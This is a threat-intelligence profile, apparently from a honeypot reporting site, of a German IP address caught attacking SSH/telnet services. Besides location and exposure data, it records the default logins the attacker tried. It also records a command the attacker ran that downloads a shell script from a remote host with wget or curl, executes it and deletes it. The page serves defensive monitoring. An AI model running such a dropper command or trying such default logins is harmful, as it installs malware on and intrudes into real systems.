Active Threat • LOW

62.171.152.61

Country of Origin🇩🇪 Germany

First Detection4/26/2026

Last Activity4/26/2026

ISPContabo GmbH

🎯

Total Attacks

🔌

Ports

📡

Attack Types

🦠

Malware

Geolocation

Country: 🇩🇪 Germany
City: Frankfurt am Main
ASN: AS51167
ISP: Contabo GmbH

Attack Types

ssh_telnet_honeypot

Attacked Ports

Associated Malware

eeddf4d6ac7d44fc46fe...→

Attempted Credentials

🔐root/root

🔐admin/admin

Executed Commands

cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://62.171.142.33/payload.sh -O p.sh 2>/dev/null || busybox wget -q http://62.171.142.33/payload.sh -O p.sh 2>/dev/null || curl -s http://62.171.142.33/payload.sh -o p.sh; chmod +x p.sh; sh p.sh; rm -rf p.sh

$uname -m1x

Shodan InternetDB ExposureShodan

InternetDB data, not real-time

Ports

443

Hostnames

vmi3208269.contaboserver.net

CPEs

cpe:/a:f5:nginx

Risk Assessment

/100

LowMediumHighCritical